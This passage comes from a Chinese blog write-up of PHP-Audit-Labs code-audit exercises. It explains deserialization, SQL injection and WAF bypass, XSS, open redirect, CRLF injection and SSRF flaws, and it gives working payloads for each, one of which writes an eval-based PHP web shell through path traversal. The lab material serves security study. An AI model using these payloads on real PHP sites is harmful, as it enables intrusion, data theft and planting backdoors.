 <p>注意到HITCON类则有一个跟前面例子一样的loaddata。那就可以用相同方法绕过执行反序列化。</p> 
 <p>HITCON类login方法显然存在sql注入,且loaddata就是在这里被调用的。那么我们需要让loaddata传入的数据为SoFun类的文件包含序列化数据。<br> 而这一数据来自<code>$obj->role</code>.</p> 
 <p><code>$obj</code>是sql语句的返回结果。而sql表结构中第三个字段role正是我们需要的。那么只要利用这个sql注入进行union查询就达成<code>$obj->role</code>可控。</p> 
 <p>由于析构函数中可以控制我们调用的方法及参数。所以以上思路可以执行。</p> 
 <p>最后注意的是。HITCON类的wakeup会对sql语句进行转义。所以我们用同样的方法绕过wakeup即可</p> 
 <p><code>O:6:"HITCON":3:{s:6:"method";s:5:"login";s:4:"args";a:2:{s:8:"username";s:81:"1' union select 1,2,'a:1:{s:2:"xx";O:%2b5:"SoFun":2:{s:4:"file";s:8:"flag.php";}}'%23";s:8:"password";s:3:"234";}}</code></p> 
 <h2>Day12</h2> 
 <h3>htmlentities()处理不全</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 654px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>这里的代码存在一个xss攻击.<br> 输出点在一个a标签。同时输出时经过了一次htmlentities.不过这个函数<code>htmlentities()</code>并不能转换所有的特殊字符，是转换除了空格之外的特殊字符，且单引号和双引号需要单独控制<br> 此处默认值的话是不会转义单引号的。<br> 同时前面在变量覆盖时传入的变量只对<code>$value</code> 进行类型转换，强制变成int类型。但是这部分代码只处理了 <code>$value</code> 变量，没针对 <code>$key</code> 变量进行处理</p> 
 <p>所以payload是<br> <code>/?a'onclick%3dalert(1)%2f%2f=c</code><br> 绕过intval的同时执行了a标签的onclik事件,达成xss.</p> 
 <h3>练习</h3> 
 <pre><code class="php"><?php
require 'db.inc.php';

if(isset($_REQUEST['username'])){
    if(preg_match("/(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['username'])){
        die("Attack detected!!!");
    }
}

if(isset($_REQUEST['password'])){
    if(preg_match("/(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['password'])){
        die("Attack detected!!!");
    }
}

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);


$query='SELECT * FROM ctf.users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';

#echo $query;

$result=mysql_query($query);
while($row = mysql_fetch_array($result))
{
    echo "<tr>";
    echo "<td>" . $row['name'] . "</td>";
    echo "</tr>";
}

?>
</code></pre> 
 <p>这里首先要达成sql注入,自然比较关心是否能闭合单引号。但是注意到,此处的htmlentities严格转义了单双引号。不能进行闭合。</p> 
 <p>但是不用引号闭合的另外的办法就是非常常见的<code>\</code>进行转义。这样password的值就变成可控的注入位置了。</p> 
 <p>接下来比较关心的是代码中对username与password关键字的过滤。这里过滤很简单,其他盲注之类的方法当然可以做到。不过这里可以用到一个容易被忘记的小技巧:</p> 
 <blockquote> 
  <p>php.ini中默认<br> 如果以 POST 、 GET 方式传入相同的变量，那么用 REQUEST 获取该变量的值将为 POST 该变量的值</p> 
 </blockquote> 
 <p>所以post数据会覆盖掉get的数据。我们用post传正常的payload、再用get执行sql语句即可</p> 
 <pre><code>get:username=\&password=union select 1,flag,3,4 from ctf.users%23

post: username=1&password=2
</code></pre> 
 <h2>Day13</h2> 
 <h3>waf失效进行sql注入</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 745px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>本题显然代码中存在sql语句拼接。但是只有一个addslashes,除非是二次注入否则不能利用。<br> 然而代码中却出现了很弱智的检查<code>substr()</code>,其长度被定死为20.那么我们只要卡在这个点使用单引号就能导致转义失效了</p> 
 <pre><code>user=1234567890123456789'&passwd=or 1=1#
</code></pre> 
 <p>在某CMS中,对sql语句进行了htmlentites处理。但是同时数据在传入前会进行一次urldecode。我们知道,在waf检测后再进行解码操作无疑是具有危害性的。(比如json_deocde如果在waf检测之后的话,就能用unicode绕过任意字符waf)</p> 
 <h3>练习</h3> 
 <pre><code class="php">//index.php
<?php
require 'db.inc.php';
  function dhtmlspecialchars($string) {
      if (is_array($string)) {
          foreach ($string as $key => $val) {
              $string[$key] = dhtmlspecialchars($val);
          }
      }
      else {
          $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&', '"', '<', '>', '（', '）'), $string);
          if (strpos($string, '&#') !== false) {
              $string = preg_replace('/&((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
          }
      }
      return $string;
  }
  function dowith_sql($str) {
      $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
      if ($check) {
          echo "非法字符!";
          exit();
      }
      return $str;
  }
  // 经过第一个waf处理
  foreach ($_REQUEST as $key => $value) {
      $_REQUEST[$key] = dowith_sql($value);
  }
  // 经过第二个WAF处理
  $request_uri = explode("?", $_SERVER['REQUEST_URI']);
  if (isset($request_uri[1])) {
      $rewrite_url = explode("&", $request_uri[1]);
      foreach ($rewrite_url as $key => $value) {
          $_value = explode("=", $value);
          if (isset($_value[1])) {
              $_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));
          }
      }
  }
  // 业务处理
  if (isset($_REQUEST['submit'])) {
      $user_id = $_REQUEST['i_d'];
      $sql = "select * from ctf.users where id=$user_id";
      $result=mysql_query($sql);
      while($row = mysql_fetch_array($result))
      {
          echo "<tr>";
          echo "<td>" . $row['name'] . "</td>";
          echo "</tr>";
      }
  }
?>
</code></pre> 
 <p>这个练习很有营养。用到了几个php的特性<br> 1.传入的非法的 <code>$_GET</code> 数组参数名,PHP会将他们替换成下划线<br> 2.传入多个相同参数时,php只会接受最后一个(类似js了)<br> 3.<code>$_SERVER['REQUEST_URI']</code>方式获得的参数，并不会对参数中的某些特殊字符进行替换</p> 
 <p>本题代码中,<code>$_REQUEST</code>的数据会经过<code>dowith_sql</code>处理。而之后第二个waf会对<code>$_SERVER['REQUEST_URI']</code>进行<code>dhtmlspecialchars()</code>处理.</p> 
 <p>那么此处思路如下,使用payload<br> <code>i_d=padyload&i.d=123</code><br> 经过第一次waf时，php会将参数中的某些特殊符号替换为下划线。因此便得到了两个i_d,其中不含恶意代码的<code>i_d</code>内容通过检查。<br> 经过第二次waf时,由于代码是通过 $_SERVER['REQUEST_URI'] 取参数.检查的实际上是我们初始传入的payload。这里由于是数值型注入,所以可以直接union得到flag</p> 
 <p>payload</p> 
 <pre><code>submit=&i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=123
</code></pre> 
 <h2>Day14</h2> 
 <h3>变量覆盖+路径穿越</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 438px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>这里的代码在析构函数里有写文件的方法。因此只要id可控就能控制路径。同时看到构造函数里存在变量覆盖，那么利用起来就不难了。<br> payload</p> 
 <pre><code>id=../var/www/html/shell.php&shell=',)%0a<?=eval($_REQUEST[byc]);?>//
</code></pre> 
 <p>因为实际上写入的内容是：</p> 
 <pre><code>array(
    'id'=>'../var/www/html/shell.php',
    'lost'=>0,
    'bought'=>0,
    'shell'=>'\',)
    <?=eval($_REQUEST[byc]);?>//',
)
</code></pre> 
 <p>所以需要先闭合,换行后写shell注释即可。</p> 
 <p>某CMS中也出现了类似的变量覆盖漏洞。比如需要admin权限,而admin权限是由session数组的值决定的。因此可以直接<code>_SESSION[duomi_group_]=1&_SESSION[duomi_admin_]=1</code>覆盖。<br> 当然,前提是当前的php开启了<code>session_start()</code></p> 
 <h2>Day15</h2> 
 <h3>PHP_SELF</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 403px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>关于<code>$_SERVER['PHP']</code>:<br> <code>PHP_SELF</code>指当前的页面绝对地址,它是可以控制的.</p> 
 <p>同时代码中调用了一次urldecode,加上浏览器自带的一次解码,就可以通过二次url编码进行关键字绕过<br> <code>http://www.test.com/index.php/http:%252f%252fblog.dyboy.cn?redirect=test¶ms=test123</code><br> 此处payload即可达成302跳转</p> 
 <p><code>PHP_SELF</code>这个考点之前zer0pts的题目中也有出现过</p> 
 <h3>练习</h3> 
 <pre><code class="php">// index.php
<?php 
include "./config.php";
include "./flag.php";
error_reporting(0);

$black_list = "/admin|guest|limit|by|substr|mid|like|or|char|union|select|greatest|%00|\'|";
$black_list .= "=|_| |in|<|>|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
if(preg_match($black_list, $_GET['user'])) exit(":P"); 
if(preg_match($black_list, $_GET['pwd'])) exit(":P"); 

$query="select user from users where user='$_GET[user]' and pwd='$_GET[pwd]'";
echo "<h1>query : <strong><b>{$query}</b></strong><br></h1>";
$result = $conn->query($query);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    if($row['user']) echo "<h2>Welcome {$row['user']}</h2>";
}

$result = $conn->query("select pwd from users where user='admin'");
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $admin_pass = $row['pwd'];
}

if(($admin_pass)&&($admin_pass === $_GET['pwd'])){
    echo $flag;
}
highlight_file(__FILE__);
?>
</code></pre> 
 <p>没啥意思...跟之前校赛的套路题一样的。<code>regexp</code>进行注入<code>;%00</code>来注释。</p> 
 <h2>Day16</h2> 
 <h3>$_REQUEST</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 507px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>本题主要是一个<code>$_REQUEST</code>的例子。从题目逻辑上看,首先可以知道是进行了一次ftp的连接,同时用<code>intval</code>来试图处理我们的输入。看似无法绕过。但是实际输出下就会发现有蹊跷: <code>$_REQUEST</code>的内容不受过滤函数影响。所以虽然<code>$_REQUEST</code> 内容是上述三个全局变量的合集,但实际上是不会受影响的。</p> 
 <p>payload</p> 
 <pre><code>?mode=1%0a%0dDELETE%20test.file
</code></pre> 
 <p>1可以达成mode的判断。而后续的数据通过crlf被当做命令执行。删除了文件。</p> 
 <p>因此,需要注意<code>$_REQUEST</code>的使用。假如只对<code>GET,POST,COOKIE</code>三种进行过滤却在代码中拼接<code>REQUEST</code>是不可取的。</p> 
 <h3>练习</h3> 
 <pre><code class="php">// index.php
<?php
function check_inner_ip($url)
{
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result){
        die('url fomat error1');
    }
    try{
        $url_parse=parse_url($url);
    }
    catch(Exception $e){
        die('url fomat error2');
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16 || ip2long('0.0.0.0')>>24 == $int_ip>>24;
}

function safe_request_url($url)
{
    if (check_inner_ip($url)){
        echo $url.' is inner ip';
    }
    else{
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        $result_info = curl_getinfo($ch);
        if ($result_info['redirect_url']){
            safe_request_url($result_info['redirect_url']);
        }
        curl_close($ch);
        var_dump($output);
    }
}

$url = $_POST['url'];
if(!empty($url)){
    safe_request_url($url);
}
else{
    highlight_file(__file__);
}
//flag in flag.php 

?>
</code></pre> 
 <pre><code class="php">// flag.php
<?php
if (! function_exists('real_ip') ) {
    function real_ip()
    {
        $ip = $_SERVER['REMOTE_ADDR'];
        if (is_null($ip) && isset($_SERVER['HTTP_X_FORWARDED_FOR']) && preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) {
            foreach ($matches[0] AS $xip) {
                if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {
                    $ip = $xip;
                    break;
                }
            }
        } elseif (is_null($ip) && isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } elseif (is_null($ip) && isset($_SERVER['HTTP_CF_CONNECTING_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CF_CONNECTING_IP'])) {
            $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
        } elseif (is_null($ip) && isset($_SERVER['HTTP_X_REAL_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_X_REAL_IP'])) {
            $ip = $_SERVER['HTTP_X_REAL_IP'];
        }
        return $ip;
    }
}
$rip = real_ip();
if($rip === "127.0.0.1")
    die("HRCTF{SSRF_can_give_you_flag}");
else
    die("You IP is {$rip} not 127.0.0.1");
?>
</code></pre> 
 <p>这个应该就是当初郁师傅经典ssrf的原型了。要求从内网ip 127.0.0.1访问flag.php才能得到flag.使用的自然是当初blackhatpdf中分享的关于php及curl间对url解析的差异</p> 
 <pre><code>url=http://foo@localhost:80@www.bycsec.top/flag.php
</code></pre> 
 <p>libcurl认第一个<code>@</code>后的作为host。php及其他语言都认最后一个<code>@</code>后的作为host.所以前面绕过内网ip限制。在后面成功执行了curl</p> 
 <h2>Day17</h2> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 671px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <h2>md5 raw_output = true</h2> 
 <p>这其实是一个很经典的漏洞 => 如果提到 ffifdyop应该就很熟悉了。传说中的万能密码绕过。 而之所以存在这个绕过的原因是md5这个函数第二个选项就是<code>raw_output</code>。默认为false。但是假如设为true的话MD5报文摘要将以16字节长度的原始二进制格式返回。这样就会存在一些奇怪的字符。因此 ffifdyop 在经过md5后的内容恰好是<code>'or'6\xc9]\x99</code>.符合万能密码的要求。</p> 
 <p>本题也是同样的道理。<code>addslashes</code>看似不能绕过。但是因为拼接的是md5后的pass.所以只要找到一个数字md5后的raw内容包含<code>\</code>即可。</p> 
 <p>payload</p> 
 <pre><code>user= OR 1=1#&passwd=128
</code></pre> 
 <h2>summary</h2> 
 <p>时隔两个月终于又把auditlabs的坑填完了...... 不得不说里面涵盖的很多php相关漏洞都是些新手刚刚入门平台里的那些经典题目的原理。当初有的半懂不懂，现在算是把坑给填上了。</p> 
 <p>然后自己最近有些纠结。原本因为接触了一些国际赛后，开始投身nodejs与python相关的漏洞了。出了几道题也都只是node跟python.唯一一道php还是sql注入。可能自己心里对php还是谈不上喜欢吧，没有钻研细节的劲头，更没有进行相关开发的想法。但最近头一次实战发现php仍旧是网站大头之一,并且ctf比赛中php还是有着能够难倒人的绝对水准。假如我想要继续提升实力，仍旧得在php下下不少功夫。更何况看框架的洞已经算最近的一大乐趣了233.</p> 
 <p>所以说,希望自己还是能花点时间去多看看php.找时间练练手。最后能多出几个题就好了。</p> 
</article>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1683787457562226688"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(PHP-Audit-Labs审计学习)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1882907754474041344.htm"
                           title="stable diffusion 模型和lora融合" target="_blank">stable diffusion 模型和lora融合</a>
                        <span class="text-muted">Kun Li</span>
<a class="tag" taget="_blank" href="/search/%E5%9B%BE%E5%83%8F%E8%A7%86%E9%A2%91%E7%94%9F%E6%88%90%E5%A4%A7%E6%A8%A1%E5%9E%8B/1.htm">图像视频生成大模型</a><a class="tag" taget="_blank" href="/search/stable/1.htm">stable</a><a class="tag" taget="_blank" href="/search/diffusion/1.htm">diffusion</a>
                        <div>炜哥的AI学习笔记——SuperMerger插件学习-哔哩哔哩接下来学习的插件名字叫做SuperMerger，它的作用正如其名，可以融合大模型或者LoRA，一般来说会结合之前的插件LoRABlockWeight使用，在调整完成LoRA模型的权重后使用改插件进行重新打包。除了LoRA，Checkpoint也可以通过这个插件进行融合合并。实际上，目前市面上存在大量的Checkpoint模型都是经由合并</div>
                    </li>
                    <li><a href="/article/1882905613973909504.htm"
                           title="chatgpt赋能python：Python重装pip：解决Python包管理器问题" target="_blank">chatgpt赋能python：Python重装pip：解决Python包管理器问题</a>
                        <span class="text-muted">sc17332889342</span>
<a class="tag" taget="_blank" href="/search/ChatGpt/1.htm">ChatGpt</a><a class="tag" taget="_blank" href="/search/chatgpt/1.htm">chatgpt</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/pip/1.htm">pip</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA/1.htm">计算机</a>
                        <div>Python重装pip：解决Python包管理器问题介绍Python是一种开发流行的编程语言，因其易于学习，功能强大和易于使用的包管理器而闻名。pip是Python软件包管理器，可让开发人员轻松地使用Python软件包。许多开发人员可能遇到过pip问题，如错误消息或无法安装软件包。幸运的是，重新安装pip是解决这些问题的常见方法。在此文章中，我们将介绍如何重装pip，解决常见的Python包管理问</div>
                    </li>
                    <li><a href="/article/1882904226682695680.htm"
                           title="Java Web学习笔记" target="_blank">Java Web学习笔记</a>
                        <span class="text-muted">淘气的然酱</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1.htm">计算机学习笔记</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>JavaWeb后端基础第1章Maven项目1.1Maven简介Maven基于项目对象模型，通过一小段描述信息来管理项目的构建、报告和文档。Maven提供了一套标准化的项目结构、构建流程和一套依赖管理机制。Maven模型：pom.xml→项目对象模型↔依赖管理模型→仓库Maven仓库包含本地仓库、中央仓库、远程仓库（私服）。Maven项目获取jar包时，首先在本地仓库寻找是否有对应jar包，若没有则</div>
                    </li>
                    <li><a href="/article/1882902336301494272.htm"
                           title="基于深度学习的鸟类识别系统详解（UI界面 + YOLOv10 + 数据集）" target="_blank">基于深度学习的鸟类识别系统详解（UI界面 + YOLOv10 + 数据集）</a>
                        <span class="text-muted">2025年数学建模美赛</span>
<a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/ui/1.htm">ui</a><a class="tag" taget="_blank" href="/search/YOLO/1.htm">YOLO</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%A7%86%E8%A7%89/1.htm">计算机视觉</a>
                        <div>引言鸟类识别是计算机视觉领域中一个独具挑战性的任务，尤其是在复杂的自然环境中，识别不同种类的鸟类需要非常强大的模型和丰富的数据集。随着深度学习技术的发展，基于YOLO（YouOnlyLookOnce）系列模型的目标检测系统展现了卓越的性能，特别是在速度和精度上的平衡方面。本博客将详细讲解如何利用YOLOv10模型来构建一个基于深度学习的鸟类识别系统。该系统会结合自定义鸟类数据集，设计一个简洁直观的</div>
                    </li>
                    <li><a href="/article/1882900948800565248.htm"
                           title="PLS_INTEGER：Oracle PL/SQL中的整数类型深度解析" target="_blank">PLS_INTEGER：Oracle PL/SQL中的整数类型深度解析</a>
                        <span class="text-muted">小小野猪</span>
<a class="tag" taget="_blank" href="/search/Oracle/1.htm">Oracle</a><a class="tag" taget="_blank" href="/search/PL%2FSQL%E8%AF%AD%E6%B3%95%E4%B8%8E%E6%A1%88%E4%BE%8B%E6%B7%B1%E5%BA%A6%E8%A7%A3%E6%9E%90/1.htm">PL/SQL语法与案例深度解析</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/PLS_INTEGER/1.htm">PLS_INTEGER</a>
                        <div>PLS_INTEGER：OraclePL/SQL中的整数类型深度解析一、概述二、PLS_INTEGER简介三、PLS_INTEGER的优点四、PLS_INTEGER的简单示例示例1：声明并使用PLS_INTEGER变量示例2：在存储过程中使用PLS_INTEGER五、资深应用的代码示例示例3：使用PLS_INTEGER进行复杂的数学计算六、结论七、学习与成长一、概述在Oracle数据库中，PL/S</div>
                    </li>
                    <li><a href="/article/1882898300533796864.htm"
                           title="QT学习小案例" target="_blank">QT学习小案例</a>
                        <span class="text-muted">Liguopi666</span>
<a class="tag" taget="_blank" href="/search/qt/1.htm">qt</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>dialog.h#ifndefDIALOG_H#defineDIALOG_H#include#include#include#include#includeQT_BEGIN_NAMESPACEnamespaceUi{classDialog;}QT_END_NAMESPACEclassDialog:publicQDialog{Q_OBJECTpublic:Dialog(QWidget*parent=</div>
                    </li>
                    <li><a href="/article/1882891875396939776.htm"
                           title="Nginx与API Gateway：服务路由" target="_blank">Nginx与API Gateway：服务路由</a>
                        <span class="text-muted">墨瑾轩</span>
<a class="tag" taget="_blank" href="/search/%E4%B8%80%E8%B5%B7%E5%AD%A6%E5%AD%A6Nginx%E3%80%90%E4%B8%80%E3%80%91/1.htm">一起学学Nginx【一】</a><a class="tag" taget="_blank" href="/search/nginx/1.htm">nginx</a><a class="tag" taget="_blank" href="/search/gateway/1.htm">gateway</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>关注墨瑾轩，带你探索编程的奥秘！超萌技术攻略，轻松晋级编程高手技术宝库已备好，就等你来挖掘订阅墨瑾轩，智趣学习不孤单即刻启航，编程之旅更有趣欢迎来到Nginx与APIGateway的世界！今天我们要一起探索的是如何使用Nginx作为APIGateway来实现服务路由。想象一下，Nginx就像是一位超级向导，它能够引导每一位游客（请求）去往他们想去的景点（服务）。引言：APIGateway的魅力在微</div>
                    </li>
                    <li><a href="/article/1882890867686043648.htm"
                           title="MySQL入门学习-索引.删除索引" target="_blank">MySQL入门学习-索引.删除索引</a>
                        <span class="text-muted">守护者170</span>
<a class="tag" taget="_blank" href="/search/MySQL%E5%AD%A6%E4%B9%A0/1.htm">MySQL学习</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a>
                        <div>一、索引的概念索引是一种特殊的数据结构，用于加速数据库中数据的检索。它可以提高查询的效率，减少磁盘I/O操作，从而加快数据的访问速度。二、索引的类型MySQL支持多种类型的索引，包括：1.主键索引（PRIMARYKEY）：用于唯一标识表中的每行记录。2.唯一索引（UNIQUE）：确保表中某一列的值是唯一的。3.普通索引（INDEX）：用于加速数据的查询。4.全文索引（FULLTEXT）：用于对文本</div>
                    </li>
                    <li><a href="/article/1882887716421562368.htm"
                           title="自动驾驶系统研发系列—追尾风险不再隐形：解密后碰撞预警系统（RCW）的技术与应用" target="_blank">自动驾驶系统研发系列—追尾风险不再隐形：解密后碰撞预警系统（RCW）的技术与应用</a>
                        <span class="text-muted">学步_技术</span>
<a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E9%A9%BE%E9%A9%B6%E7%B3%BB%E7%BB%9F%E7%A0%94%E5%8F%91/1.htm">自动驾驶系统研发</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E9%A9%BE%E9%A9%B6/1.htm">自动驾驶</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/1.htm">机器学习</a><a class="tag" taget="_blank" href="/search/RCW/1.htm">RCW</a>
                        <div>欢迎来到我的技术小筑，一个专为技术探索者打造的交流空间。在这里，我们不仅分享代码的智慧，还探讨技术的深度与广度。无论您是资深开发者还是技术新手，这里都有一片属于您的天空。让我们在知识的海洋中一起航行，共同成长，探索技术的无限可能。探索专栏：学步_技术的首页——持续学习，不断进步，让学习成为我们共同的习惯，让总结成为我们前进的动力。技术导航：人工智能：深入探讨人工智能领域核心技术。自动驾驶：分享自动</div>
                    </li>
                    <li><a href="/article/1882884944854839296.htm"
                           title="解锁编程智慧：23种设计模式案例分享" target="_blank">解锁编程智慧：23种设计模式案例分享</a>
                        <span class="text-muted">码农技术栈</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                        <div>为什么要学习设计模式？你可以把设计模式想象成一些做饭的菜谱。当我们需要做一道菜（开发一个功能）时，如果按照自己的想法随意添加调料（编写代码），很可能做出的菜味道不好（功能不稳定或有bug）。但是，如果我们按照一个成功的菜谱（设计模式）来做，就能更容易地做出美味的菜肴（开发出稳定的功能）。设计模式就是一些在软件开发中经常被使用的“菜谱”，它们可以帮助我们更好地组织代码、提高代码的可读性和可维护性。这</div>
                    </li>
                    <li><a href="/article/1882884061937070080.htm"
                           title="spring cloud之gateway和JWT回顾" target="_blank">spring cloud之gateway和JWT回顾</a>
                        <span class="text-muted">晨的挥霍</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/cloud/1.htm">cloud</a><a class="tag" taget="_blank" href="/search/gateway/1.htm">gateway</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                        <div>最开始学习时，没怎么用，只知道它是网关，当时因为经常使用Nginx做网关，慢慢就淡忘了，最近为了代码整合性，就使用它，非常棒。关于JWT以前也使用，后面调用基本以第三方接口开发的比较多，当时自己的服务，添加自己的规则生成token整合gateway网关1、pomorg.springframework.bootspring-boot-starter-actuatororg.springframewo</div>
                    </li>
                    <li><a href="/article/1882883934514114560.htm"
                           title="C语言青蛙跳台阶问题" target="_blank">C语言青蛙跳台阶问题</a>
                        <span class="text-muted">共享家9527</span>
<a class="tag" taget="_blank" href="/search/c%E8%AF%AD%E8%A8%80/1.htm">c语言</a>
                        <div>在算法学习中，青蛙跳台阶问题是一个经典的递归和动态规划入门案例。它通过简单的场景，揭示了复杂的算法思想，非常适合初学者理解递归与动态规划的核心概念。一、问题描述一只青蛙要跳上n级台阶，每次它可以跳1级或者2级台阶。那么，青蛙跳上n级台阶总共有多少种不同的跳法呢？二、解题思路递归思路：-对于第n级台阶，青蛙到达它的方式要么是从第n-1级台阶跳1级上来，要么是从第n-2级台阶跳2级上来。-所以，跳上n</div>
                    </li>
                    <li><a href="/article/1882883930001043456.htm"
                           title="分享一个基于.NET6包含DDD,ES,CQRS等概念的开源项目" target="_blank">分享一个基于.NET6包含DDD,ES,CQRS等概念的开源项目</a>
                        <span class="text-muted">寒冰屋</span>
<a class="tag" taget="_blank" href="/search/ASP.NET/1.htm">ASP.NET</a><a class="tag" taget="_blank" href="/search/CORE/1.htm">CORE</a><a class="tag" taget="_blank" href="/search/.net6/1.htm">.net6</a><a class="tag" taget="_blank" href="/search/ddd/1.htm">ddd</a><a class="tag" taget="_blank" href="/search/CQRS/1.htm">CQRS</a>
                        <div>当你在学习DDD、CQRS或时间溯源时，除了大量的学习资源（比如书籍和文章）之外，你还接触到了许多概念，这些资源只是在讨论理论问题。这很好，我们知道他们在说什么，但我们如何在一个真正的项目中使用他们呢？我们如何实现这些目标呢？当您试图获取一些代码示例时，通常会发现一些简单的示例通过在仅包含一个实体的域中移动来演示这些复杂的概念，而该域通常包含一个实体，而该实体通常是消费者。这些都是很好的例子，但是</div>
                    </li>
                    <li><a href="/article/1882883677990481920.htm"
